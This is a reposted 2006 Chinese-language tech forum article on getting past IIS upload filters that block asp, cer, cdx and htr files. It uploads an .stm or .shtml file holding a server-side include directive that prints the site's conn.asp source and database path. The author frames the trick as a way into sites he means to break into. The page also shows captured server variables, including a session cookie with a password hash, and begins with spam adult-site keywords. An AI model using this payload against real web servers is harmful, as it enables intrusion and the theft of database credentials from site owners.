亚洲成精品动漫久久精久,九九在线精品视频播放,黄色成人免费观看,三级成人影院,久碰久,四虎成人欧美精品在永久在线

掃一掃
關注微信公眾號

不允許上傳asp,cer,cdx,htr時怎么辦
2006-07-04   賽迪網(wǎng)社區(qū)

利用stm來上傳,還能執(zhí)行程序,代碼:

  說保存為stm或者shtml看看,運行如下:

HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg,
 image/pjpeg, application/x-shockwave-flash,
 application/vnd.ms-powerpoint, 
application/vnd.ms-excel, application/msword,
 */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive
 HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0
 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) 
HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; 
bblastactivity=1100265530; bbuserid=1;
 bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; 
ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ 
HTTP_ACCEPT_ENCODING:gzip, deflate 
當前文件名稱:F:Web1.stm

  Web服務器的名稱和版本:Microsoft-IIS/5.0
  主機名:localhost
  端口:80
  客戶或客戶代理IP地址:127.0.0.1
  客戶或客戶代理主機名:127.0.0.1
  PATH_INFO 的值,但帶有擴展為某個目錄規(guī)范的虛擬路    徑:F:Web1.stm
  客戶端給出附加路徑信息:/1.stm
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*

  Quoted from Unkown:


  當網(wǎng)站不允許上傳asp cer cdx htr等文件時, 上傳一個stm文件, 內(nèi)容為:

  <!--#include file="conn.asp"-->

  直接請求這個stm文件, conn.asp就一覽無遺, 數(shù)據(jù)庫路徑也就到手啦。
  原來就是如上所說的,

  <!--#include file="conn.asp"-->

  就是一條SSI指令,其作用是將"info.htm"的內(nèi)容拷貝到當前的頁面中,當訪問者來瀏覽時,會看到其它HTML文檔一樣顯示info.htm其中的內(nèi)容。
我在本地試驗成功!在我的iis目錄下建了一個test.stm文件,內(nèi)容為:

  <!--#include file="conn.asp"-->

  又在同一目錄下放了一個我的一個木馬文件ok.asp在瀏覽器中請求test.stm,沒有什么反映,一片空白。但是一查看源代碼,狂暈,原來就是我的asp文件的內(nèi)容!這樣我們就可以利用這個來獲取要入侵的web的conn文件來獲得數(shù)據(jù)庫路徑,但是一個前提是服務器的對stm或者shtml的擴展沒有刪除!

熱詞搜索:

上一篇:路由技術:在SCO UNIX架設簡單路由器
下一篇:打造頂級堅固的“鈦金” 進程防火墻

分享到: 收藏